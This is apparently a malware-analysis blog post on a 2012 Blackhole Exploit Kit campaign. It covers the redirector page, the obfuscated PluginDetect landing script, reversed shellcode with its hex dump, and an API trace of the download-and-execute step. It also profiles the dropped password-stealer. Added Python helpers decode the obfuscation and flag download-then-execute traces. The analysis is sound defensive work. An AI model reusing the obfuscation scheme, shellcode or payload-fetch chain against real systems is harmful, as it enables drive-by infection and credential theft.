Infection Summary
Spam emails to redirector landing page.
Hacked WordPress page: isoheraly.wordpress.com / 74.200.244.59, 76.74.254.120,
72.233.2.58, 76.74.254.123, 74.200.243.251, 72.233.69.6
Landing page redirect: visionuvce.in / 173.254.28.115
PluginDetect/BHEK: pelamutrika.ru / 202.180.221.186
CNC/Proxy: 180.235.150.72:8080 , 203.113.98.131:80, 173.224.221.135:8080
206.176.226.157:8080, 132.248.49.112, 113.130.65.77
Here's the garbage:
Source of Infection
This time we would like to report an infection by a trojan password stealer
whose campaign uses the URL below:
h00p://visionuvce.in/redirect.htm
The campaign itself is ongoing under two patterns. One pattern is via spam email;
you may be aware of the emails with the subject:
"You have been sent a file (Filename: Gohe-43.pdf)"
or "Sendspace File Delivery Notification"
Not only spam, but also a hacked WordPress page like the URL below:
(WARNING, THE PAGE ABOVE IS UP AND ALIVE...)
We checked the source of the infector link:
--18:17:50-- h00p://visionuvce.in/redirect.htm
=> `redirect.htm'
Resolving visionuvce.in... seconds 0.00, 173.254.28.115
Caching visionuvce.in => 173.254.28.115
Connecting to visionuvce.in|173.254.28.115|:80... seconds 0.00, connected.
---request begin---
GET /redirect.htm HTTP/1.0
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: visionuvce.in
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sat, 08 Dec 2012 09:17:50 GMT
Server: Apache
Last-Modified: Fri, 07 Dec 2012 14:38:47 GMT
ETag: "5162339-1a7-4d0442c60507d"
Accept-Ranges: bytes
Content-Length: 423
Cache-Control: max-age=1209600
Expires: Sat, 22 Dec 2012 09:17:50 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 423 [text/html]
100%[====================================>] 423 --.--K/s
18:17:51 (13.88 MB/s) - `redirect.htm' saved [423/423]
↑inside the html, there is a BHEK2 redirector↓
$ cat redirect.htm
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2)
{document.location="h00p://pelamutrika・ru:8080/forum/links/column.php";}
</script>
</body>
</html>
So this is how our crusade starts..
PluginDetect 0.7.9 with new shellcode obfuscation
Using the right request parameters (referer and user agent) we fetched column.php...
--18:22:20-- h00p://pelamutrika・ru:8080/forum/links/column.php
=> `column.php'
Resolving pelamutrika・ru... seconds 0.00, 202.180.221.186
Caching pelamutrika・ru => 202.180.221.186
Connecting to pelamutrika・ru|202.180.221.186|:8080... seconds 0.00, connected.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://visionuvce・in/redirect.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: pelamutrika.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sat, 08 Dec 2012 09:20:14 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
18:22:28 (21.64 KB/s) - `column.php' saved [102600]
which contains the latest obfuscated PluginDetect 0.7.9 --->>[PASTEBIN]
The obfuscation structure is nothing special; it is as I commented below:
//let's ignore the html base tags...
<html><head><title></title></head><body>
// This is the jar infector applet to be directly downloaded, via IE header-
// "User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_23"
//
<applet archive="h00p://pelamutrika.ru:8080/forum/links/column.php?ckh=ldrxik&xnfinc=wyzs" code="hw">
<param name="prime" value="V0Kyl8qVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xS.b1fO6oO68O68O11RFebhvO6qO60O1hO11O6qO6qO16O6CO6tRUb6.R-qbDRS.b8" />
<param name="val" value="Dyy3Ojj3e-"/></applet>
<div></div>
// First scattered evil script...
<script>gg="getA"+"ttri";qq="q";asd=function(){r=a[gg+"bute"](i);};p="p"+"a";</script>
// Hiding the obfuscated data as numbered attributes (0 to 32) of the DIV with id "q"....
<div id="q"
0=";08f70;28725;85k7m;58d7c;57g7q;84n78;....
1=
2
:
:
32=";72n30;6292h;47q83;78383;78949;02930;...
</div>
//The deobfuscator generator...
<script>
if(document.getElementsByTagName("div").length>0)
{
a=document.getElementById(qq);
s="";
for(i=0;;i++){
asd();
if(r){s=s+r;}else break;
}
a=zxv=s;
s=hwebewg="";
p=parseInt;
for(i=0;i<a.length;i+=2){
if(a["substr"](i,1)==";")continue;
if(document.getElementsByTagName("div").length>0)s+=String["fromCharCode"]((p(a.substr(i,2),27)+5)/2);
}
c=s;
if(window.document){e=eval("eval");
if(document.getElementsByTagName("div")[0].style.left==="")e(c);
}}
</script>
</body></html>
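The decoder stage of the obfuscated landing page above, re-implemented offline in Python (an added example; not code from the original post or from the exploit kit). It reproduces the in-page loop exactly: the numbered attributes of the div are concatenated, the string is read two characters at a time, chunks starting with ';' are skipped, and every other chunk is parsed as a base-27 number n and mapped to the character (n + 5) / 2, truncated the way String.fromCharCode truncates. The attribute extractor and the inverse encoder are my additions for round-trip testing; the sample string is the start of attribute 0 as printed above, and the decoded text is what the in-page script would have handed to eval().

```python
import re

# Genuine fragment: the start of attribute 0 of <div id="q"> quoted above.
PAGE_SAMPLE = ";08f70;28725;85k7m;58d7c;57g7q;84n78"

BASE27_DIGITS = "0123456789abcdefghijklmnopq"


def decode_chunks(data):
    """Mirror the in-page loop: step two characters at a time, skip chunks
    whose first character is ';', otherwise parse the chunk as a base-27
    number n (parseInt(x, 27)) and emit chr((n + 5) / 2), truncating the
    .5 case like String.fromCharCode does."""
    out = []
    for i in range(0, len(data), 2):
        chunk = data[i:i + 2]
        if chunk.startswith(";"):
            continue
        n = int(chunk, 27)
        out.append(chr((n + 5) // 2))
    return "".join(out)


def extract_div_attributes(html, div_id="q"):
    """Collect the numbered attributes (0="..." 1="..." ...) of the data div.
    A regex is enough for this fixed layout; it is not a general HTML parser."""
    m = re.search(r'<div\s+id="%s"(.*?)>' % re.escape(div_id), html, re.S)
    if not m:
        return {}
    return {int(k): v for k, v in re.findall(r'(\d+)\s*=\s*"([^"]*)"', m.group(1))}


def decode_div(html, div_id="q"):
    """Join the attributes in the order the script reads them, getAttribute(0),
    getAttribute(1), ... until one is missing, then decode the whole string."""
    attrs = extract_div_attributes(html, div_id)
    parts = []
    i = 0
    while i in attrs:
        parts.append(attrs[i])
        i += 1
    return decode_chunks("".join(parts))


def encode_chunks(text, filler="0"):
    """Inverse transform, written here only for round-trip testing: each
    character c becomes the 2-digit base-27 number 2*c - 5, and every pair of
    encoded characters is prefixed with ';' plus one filler digit that the
    decoder skips. Characters with 2*c - 5 >= 27*27 cannot be represented."""
    enc = []
    for c in text:
        n = 2 * ord(c) - 5
        if not 0 <= n < 27 * 27:
            raise ValueError("cannot encode %r" % c)
        enc.append(BASE27_DIGITS[n // 27] + BASE27_DIGITS[n % 27])
    return "".join(";" + filler + "".join(enc[j:j + 2]) for j in range(0, len(enc), 2))


if __name__ == "__main__":
    print(decode_chunks(PAGE_SAMPLE))     # "var PluginDe"
    page = '<div id="q" 0=";08f70;28725" 1=";85k7m;58d7c" 2=";57g7q;84n78"></div>'
    print(decode_div(page))               # same text, via the attribute path
```

The filler digit between ';' and the data (0, 2, 5, 8 in the page's sample) carries no information; the decoder skips the whole ";d" pair, which is why a fixed filler in the encoder still round-trips.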
By using the guidance in the previous post on how to crack this
obfuscation you can get the original infector code with PluginDetect 0.7.9,
as I pasted here --->>[PASTEBIN]
What's different about this BHEK2 infection?
The difference is in the shellcode and the payload. Other differences are minor
and not significant enough to report in this blog.
The CVE exploits used in the components (jar, pdf & swf) are also the same as before,
meaning the files listed below are the same as in the previous week's report:
spn.jar, spn2.jar, spn3.jar, t.pdf, infector1.pdf, infector2.pdf, score.swf
The Shellcode
The shellcode itself is obfuscated in a new way that automation tools can't crack
automatically (yet); it is in the function below:
function getShellCode(){
var a = "
8282!%5114!%15e4!%04e0!%3451!%e044!..
2191!%b1b1!%a121!%21b1!%9154!%3421!..
2191!%b181!%e451!%7115!%0485!%6085!..
8170!%8101!%2101!%a5d5!%9460!%1434!..
15e1!%eee6!%3733!%2e2a!%59b1!%7492!..
8224!%ce24!%82d5!%8a71!%2df6!%82d5!..
c224!%7de7!%82b7!%e324!%8ed5!%c3da!..
2a9e!%8217!%5312!%eec6!%4444!%60c4!..
7de7!%8282!%0d82!%b704!%b580!%8050!..
42fe!%47c0!%825a!%9282!%4cc2!%a59a!..
d5a5!%8204!%6482!%0474!%7dbc!%bed2!..
8724!%8207!%8282!%0c82!%ac1d!%7d7d!..
8a55!%0480!%583a!%3cb7!%17be!%3867!..
e43a!%b25f!%67c0!%673a!%d5ec!%3173!..
58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!..
c0da!%fac1!%d53d!%11e2!%bee6!%8681!..
e502!%e73a!%8543!%423a!%3a86!%8681!..
042e!%0382!%ef08!%9ea0!%6618!%139c!..
.split("").
reverse().join("");
return a["replace"](/\%!/g, "%" + "u")
}
The split, reverse and join followed by replacing "%!" with "%u" seems to
confuse Wepawet and jsunpack, so they don't burp out the correct result.
You can use my trick and write JS code like the one below to crack it:
var x="";
var a = "8282!%5114!%15e4!%04e0!%3451!%e044!%9134!%2551!%74e..
492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8..
%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!..
a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f7..
414!%1414!%".split("").reverse().join("");
x=a["replace"](/\%!/g, "%" + "u");
eval(x);
And the x passed to eval() will be the correct shellcode, as below:
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ae9%u80fe%u2..
13%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%..
4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407..
%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1..
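The reverse-and-replace trick above, followed by the "%u" extraction into raw bytes, written as an offline Python decoder (an added example; not the author's code and not part of the kit). Nothing is evaluated: the string is reversed, "%!" becomes "%u", each %uXXXX group is stored as a little-endian 16-bit word, and the bytes are hex-dumped for inspection. SAMPLE is constructed from the tail of the obfuscated literal above, extended so that it reverses to the first twelve %u words quoted from the eval() result.

```python
import re

# Constructed sample: the tail of the page's obfuscated literal, extended so
# that it reverses to the first twelve %u words quoted from the eval() result.
SAMPLE = ("042e!%0382!%ef08!%9ea0!%6618!%139c!%"
          "0185!%cfbe!%4ecf!%6638!%1414!%1414!%")


def reverse_and_fix(obfuscated):
    """Python equivalent of a.split("").reverse().join("") followed by
    a.replace(/%!/g, "%u") from getShellCode() above."""
    return obfuscated[::-1].replace("%!", "%u")


def unescape_u(encoded):
    """Turn '%u4141%u8366...' into bytes. Each group is one 16-bit value and
    its low byte is stored first, which is how unescape() lays it out."""
    groups = re.findall(r"%u([0-9a-fA-F]{4})", encoded)
    if len(groups) * 6 != len(encoded):
        raise ValueError("input is not a pure sequence of %uXXXX groups")
    out = bytearray()
    for g in groups:
        word = int(g, 16)
        out += bytes((word & 0xFF, word >> 8))
    return bytes(out)


def decode_shellcode_literal(obfuscated):
    """Whole pipeline: reverse, fix the escape prefix, unescape to bytes."""
    return unescape_u(reverse_and_fix(obfuscated))


def hexdump(data, width=16):
    """Classic offset / hex / printable-ASCII listing, one row per `width` bytes."""
    rows = []
    for off in range(0, len(data), width):
        row = data[off:off + width]
        hexpart = " ".join("%02x" % b for b in row)
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in row)
        rows.append("%04x  %-*s  %s" % (off, width * 3 - 1, hexpart, ascii_part))
    return "\n".join(rows)


if __name__ == "__main__":
    print(reverse_and_fix(SAMPLE))            # %u4141%u4141%u8366%ufce4...
    print(hexdump(decode_shellcode_literal(SAMPLE)))
```

The first dump row comes out as the "AAAAf......X1.f." line the snapshot below shows, which is the quickest way to confirm that the reversal and the byte order were applied correctly before handing the bytes to a disassembler or emulator.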
This format can be cracked well by some automation tools, or you can do it manually
like I do, by deleting the "%u" and extracting the hex into binary,
like the snapshot below (it is hex-dumped code, useless/harmless in this form):
41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81 AAAAf......X1.f.
e9 Oa fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff ....O(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c Oc ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7 \+....@...B-q...
d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O .,^Z...l....[.{@
dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 2O cO b4 d6 d7 d7 a6 66 26 c4 bO d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7 &.G)....s3.nQ.2.
58 4O 5c 5c 58 12 O7 O7 58 4d 44 49 45 5d 5c 5a X@\\X...XMDIE]\Z
41 43 49 O6 5a 5d 12 1O 18 1O 18 O7 4e 47 5a 5d ACI.Z]......NGZ]
45 O7 44 41 46 43 5b O7 4b 47 44 5d 45 46 O6 58 E.DAFC[.KGD]EF.X
4O 58 17 51 4e 15 1b 18 12 19 46 12 19 41 12 19 @X.QN.....F..A..
41 12 1b 1b Oe 59 4d 15 1a 5e 12 19 43 12 19 45 A....YM..^..C..E
12 1b 1a 12 1b 1b 12 19 43 12 19 43 12 1b 19 12 ........C..C....
19 42 12 19 47 Oe 52 15 19 43 Oe 44 43 15 4O Oe .B..G.R..C.DC.@.
51 4e 15 41 28 28 QN.A((
This reveals the API operations, using kernel32.dll & urlmon.dll,
that download, save, run & register the malware on your PC:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://pelamutrika・ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
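A small correlator for traces like the one above (an added example, not the author's tooling; the sample lines are the ones quoted above, with the URL still defanged as h00p). It parses each call line, remembers every file path that URLDownloadToFileA writes, and flags the later WinExec calls that run that path, whether directly or through "regsvr32 -s". The set of launch APIs and the argument names it looks for are assumptions that fit this trace format.

```python
import re

# Sample trace: the lines from the post, URL kept defanged (h00p).
TRACE = r"""
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://pelamutrika.ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
""".strip().splitlines()

LINE_RE = re.compile(r"^0x[0-9a-fA-F]+\s+(\w+)\.(\w+)\((.*)\)$")
# Assumed set of process-launch APIs worth correlating with a download.
EXEC_APIS = {"WinExec", "CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW"}


def parse_call(line):
    """Return (module, function, {arg: value}) or None for a non-call line.
    Arguments are split only at ', ' that is followed by 'name=', so URLs and
    paths containing ':' or '&' stay intact; '[...]' result values are kept."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    module, func, argstr = m.groups()
    args = {}
    for part in re.split(r",\s+(?=\[?\w+=)", argstr):
        name, _, value = part.strip("[]").partition("=")
        args[name] = value
    return module, func, args


def find_download_and_execute(lines):
    """Correlate URLDownloadToFileA targets with later process launches."""
    downloads = {}   # lowercase path -> source URL
    findings = []
    for line in lines:
        parsed = parse_call(line)
        if not parsed:
            continue
        _module, func, args = parsed
        if func == "URLDownloadToFileA" and "szFileName" in args:
            downloads[args["szFileName"].lower()] = args.get("szURL", "?")
        elif func in EXEC_APIS:
            cmd = (args.get("lpCmdLine") or args.get("lpCommandLine")
                   or args.get("lpFile", "")).lower()
            for path, url in downloads.items():
                if path in cmd:
                    via = "regsvr32" if "regsvr32" in cmd else "direct"
                    findings.append({"path": path, "url": url, "via": via, "api": func})
    return findings


if __name__ == "__main__":
    for f in find_download_and_execute(TRACE):
        print("%-8s %s <- %s" % (f["via"], f["path"], f["url"]))
```

The download path is keyed in lower case because the trace shows it once in 8.3 form (DOCUME~1) and a real trace may mix cases; the regsvr32 case is reported separately because it is the registration step the post describes rather than a plain launch.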
The Payload
The shellcode shows the payload download URL below:
h00p://pelamutrika・ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
I fetched it like this:
--13:34:29-- h00p://pelamutrika.ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
=> `column.php@yf=30%3A1n%3A1i%3A1i%3A33&qe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&z=1k&lk=h&yf=i'
Resolving pelamutrika.ru... seconds 0.00, 202.180.221.186
Caching pelamutrika.ru => 202.180.221.186
Connecting to pelamutrika.ru|202.180.221.186|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5768 (new refcount 1).
---request begin---
GET /forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i HTTP/1.0
Referer: h00p://pelamutrika.ru:8080/forum/links/column.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: pelamutrika.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sun, 09 Dec 2012 04:32:22 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Sun, 09 Dec 2012 04:33:15 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
Content-Length: 121344
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 121,344 (119K) [application/x-msdownload]
100%[====================================>] 121,344 54.23K/s
13:34:33 (54.12 KB/s) - `column.php@yf=30%3A1n%3A1i%3A1i%3A33&qe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&z=1k&lk=h&yf=i' saved [121344/121344]
And there is your payload :-)
You can also go through infector**.pdf, which has the same shellcode
to download the payload; I verified it myself as the same one.
What does this payload really do?
Let's save the payload under its original name on the server, "contacts.exe".
I analyzed the binary as below:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 BF 0F C2 50 00 00 00 00 PE..L......P....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 46 00 00 ...........2.F..
00A0 00 94 01 00 00 00 00 00 00 10 00 00 00 10 00 00 ................
00B0 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 .p....@.........
: : :
MD5: a8ccedc5fe10ea98cb84a8ad20901d8e
Size: 118.5 KB ( 121344 bytes )
block 0x40
type EXEC (Executable file)
os windows
arch i386
bits 32
endian little
Valid PE file
Entry Point: 0x1000
Sections:
.code 0x1000 0x2312 9216 <=== EP
.text 0x4000 0x219a 8704
.rdata 0x7000 0xc0 512
.data 0x8000 0xa8c 2048
Compile Time: 0x50C20FBF [Fri Dec 07 15:48:15 2012 UTC]
Compiler Trace: MS Visual C++
CRC Failed. Claimed: 0, Actual: 153281
Invalid Import data at RVA: 0x8244 // Crypter?
the RVA is invalid: 0x2e2e9020 // Crypter?
//Suspicious DLL's Calls
DEP setting change trace: 0x40837c HeapCreate
Anti Debugging traces : 0x40839c LoadLibraryA
Anti Debugging traces : 0x4083a0 GetProcAddress
TLS aware call : 0x408398 TlsAlloc
//Interesting strings: "MopLon66" suggests a crypter series..
File Mem Strings..
------------------------------------
0x005E00 0x409A00 MopLon66/
0x005EF0 0x409AF0 MopLon661MopLon66SXPOWOTSXOXWWXWWVRQVVURQSXTRTTOWOVQRPSRWXTWRXXUTPXMopLon66ID
0x01D951 0x421551 ,UMopLon66
Interesting!
All DLL calls can be reviewed well, but many functions are encrypted.
// We can see plainly the data text..
.rdata:00407004 0000000C C IsAppThemed
.rdata:00407010 0000000C C uxtheme.dll
.rdata:0040701C 0000000E C DllGetVersion
.rdata:0040702C 0000000D C COMCTL32.DLL
.rdata:0040703C 0000000B C AlphaBlend
.rdata:00407048 0000000C C msimg32.dll
.data:0040843E 00000007 C memset
.data:00408446 0000000B C MSVCRT.dll
.data:00408454 00000011 C GetModuleHandleA
.data:00408468 0000000B C HeapCreate
.data:00408476 0000000C C HeapDestroy
.data:00408484 0000000C C ExitProcess
.data:00408490 0000000D C KERNEL32.dll
.data:004084A0 00000007 C strlen
.data:004084AA 00000007 C strcpy
.data:004084B4 00000008 C strncpy
.data:004084BE 00000007 C strcat
.data:004084C8 00000005 C fabs
.data:004084D0 00000005 C ceil
.data:004084D8 00000007 C malloc
.data:004084E2 00000006 C floor
.data:004084EA 00000005 C free
.data:004084F2 00000007 C fclose
.data:004084FC 00000007 C memcpy
.data:00408506 00000007 C _CIexp
.data:00408510 00000009 C HeapFree
.data:0040851C 0000000A C HeapAlloc
.data:00408528 00000014 C GetCurrentProcessId
.data:0040853E 00000013 C GetCurrentThreadId
.data:00408554 00000009 C TlsAlloc
.data:00408560 0000000D C LoadLibraryA
.data:00408570 0000000F C GetProcAddress
.data:00408582 0000000C C FreeLibrary
.data:00408590 0000000E C GetVersionExA
.data:004085A0 0000000C C HeapReAlloc
.data:004085AE 00000010 C CallWindowProcA
.data:004085C0 00000014 C GetForegroundWindow
.data:004085D6 00000019 C GetWindowThreadProcessI
.data:004085F2 00000010 C IsWindowVisible
.data:00408604 00000010 C IsWindowEnabled
.data:00408616 0000000F C GetWindowLongA
.data:00408628 0000000D C SetWindowPos
.data:00408638 0000000D C EnableWindow
.data:00408648 0000000C C EnumWindows
.data:00408656 0000000C C DestroyIcon
.data:00408664 00000009 C FillRect
.data:0040866E 0000000B C USER32.DLL
.data:0040867C 00000008 C EndPage
.data:00408686 00000007 C EndDoc
.data:00408690 0000000E C GetObjectType
.data:004086A0 0000000D C DeleteObject
.data:004086B0 0000000B C GetObjectA
.data:004086BE 00000013 C CreateCompatibleDC
.data:004086D4 0000000A C GetDIBits
.data:004086E0 00000009 C DeleteDC
.data:004086EC 00000011 C CreateDIBSection
.data:00408700 0000000D C SelectObject
.data:00408710 00000007 C BitBlt
.data:0040871A 0000000D C CreateBitmap
.data:0040872A 00000009 C SetPixel
.data:00408736 0000000F C GetStockObject
.data:00408746 0000000A C GDI32.DLL
.data:00408752 00000011 C GetSaveFileNameA
.data:00408766 00000011 C GetOpenFileNameA
.data:00408778 0000000D C COMDLG32.DLL
.data:00408788 00000015 C InitCommonControlsEx
.data:0040879E 0000000D C COMCTL32.DLL
.data:004087AE 0000000D C CoInitialize
.data:004087BC 0000000A C OLE32.DLL
While the .rsrc data is encrypted.. and (AGAIN) signed with "MopLon66":
.rsrc:004094C9 00000005 C E????
.rsrc:004094D0 0000000E C 884L4+8+4+444,
.rsrc:00409510 00000005 C ++++4
.rsrc:00409521 00000005 C ?<!??
.rsrc:00409530 00000007 C +44U((E
.rsrc:0040953E 00000005 C G&???
.rsrc:00409549 00000006 C PPYEEE
.rsrc:00409557 0000000A C ?E,?=!;EAX
.rsrc:00409587 00000005 C P!PPP
.rsrc:0040959E 00000007 C 6G/$@4P
.rsrc:004095A6 00000007 C P !;;;P
.rsrc:004095BA 00000005 C J\t%\t\t
.rsrc:004095CD 00000009 C E<E(=GGZZ
.rsrc:004095E1 00000009 C f@@@1W\x1BH/
.rsrc:004095F8 00000007 C >C:%\t$$
.rsrc:00409603 0000000A C TML]GG'>>9
.rsrc:0040960E 00000005 C 6CX@:
.rsrc:00409615 00000006 C 02\b\v\vL
.rsrc:0040961C 0000001B C J%\rC,0\\>\bRM6='^d:@X6V9:C>L%
: : : : :
: : : : :
.rsrc:00420B24 00000006 C ,ik0kK
.rsrc:00420CB3 00000005 C o!3JZ
.rsrc:00420CE7 00000007 C ,pu//Io
.rsrc:00420D0C 00000008 C l!af[Glr
.rsrc:00420E58 00000005 C \ns0bs
.rsrc:00420E9B 00000005 C FXl\r6
.rsrc:00420EDE 00000005 C !\r;{d
.rsrc:00420F47 00000005 C o'8@/
.rsrc:00420F9E 00000007 C \nCG\n/}u
.rsrc:00420FAF 00000006 C 6,-!dR
.rsrc:0042117F 00000005 C &NPw:
.rsrc:00421195 00000008 C fE='u@IY
.rsrc:0042130E 00000005 C o7$WQ
.rsrc:00421551 0000000B C ,UMopLon66 <====THERE.
Let's reverse it, I doubt it works well though... :-)
Well, to make it short, you'll see a lot of undefined calls/functions like the ones below:
If you push on hard, it'll drag you to the exit routine below:
loc_401B5E: ; uExitCode
push 0
call sub_401B78
push hHeap ; hHeap
call j_HeapDestroy
call j_ExitProcess
start endp
